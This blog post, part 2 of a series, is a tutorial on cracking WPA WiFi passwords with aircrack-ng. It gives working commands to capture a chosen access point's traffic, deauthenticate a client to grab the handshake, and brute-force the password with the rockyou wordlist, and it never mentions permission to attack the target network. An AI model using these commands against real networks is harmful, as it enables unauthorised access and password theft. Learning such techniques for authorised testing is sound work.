Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap

Screen Shot 2013-02-24 at 9.35.15 PM

This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5

Screen Shot 2013-02-24 at 9.38.43 PM

And we get the handshake.

Now we crack it. We will use a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt


if the password is in the wordlist, then

Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.


2 thoughts on “Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng”

Leave a Reply

Your email address will not be published. Required fields are marked *

Notify me of followup comments via e-mail. You can also subscribe without commenting.

This site uses Akismet to reduce spam. Learn how your comment data is processed.